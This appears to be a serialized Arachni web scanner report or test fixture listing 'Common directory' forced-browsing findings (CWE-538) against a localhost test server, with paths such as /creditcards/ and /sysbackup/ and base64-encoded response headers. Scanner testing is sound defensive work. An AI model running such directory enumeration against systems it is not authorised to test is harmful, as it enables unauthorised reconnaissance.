http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/other/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/other/ injected: other id: other elem: path remarks: {} method: '' response: other headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/accounts/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/accounts/ injected: accounts id: accounts elem: path remarks: {} method: '' response: accounts headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/warez/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/warez/ injected: warez id: warez elem: path remarks: {} method: '' response: warez headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/my/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/my/ injected: my id: my elem: path remarks: {} method: '' response: my headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mg== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/cc/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/cc/ injected: cc id: cc elem: path remarks: {} method: '' response: cc headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mg== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/creditcards/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/creditcards/ injected: creditcards id: creditcards elem: path remarks: {} method: '' response: creditcards headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/contact/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/contact/ injected: contact id: contact elem: path remarks: {} method: '' response: contact headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/press/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/press/ injected: press id: press elem: path remarks: {} method: '' response: press headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/p0rn/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/p0rn/ injected: p0rn id: p0rn elem: path remarks: {} method: '' response: p0rn headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/pron/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/pron/ injected: pron id: pron elem: path remarks: {} method: '' response: pron headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/new%20folder/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/new%20folder/ injected: new%20folder id: new%20folder elem: path remarks: {} method: '' response: new%20folder headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/New%20Folder/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/New%20Folder/ injected: New%20Folder id: New%20Folder elem: path remarks: {} method: '' response: New%20Folder headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/oldfiles/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/oldfiles/ injected: oldfiles id: oldfiles elem: path remarks: {} method: '' response: oldfiles headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/old_files/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/old_files/ injected: old_files id: old_files elem: path remarks: {} method: '' response: old_files headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/secure/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/secure/ injected: secure id: secure elem: path remarks: {} method: '' response: secure headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/sysbackup/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/sysbackup/ injected: sysbackup id: sysbackup elem: path remarks: {} method: '' response: sysbackup headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: 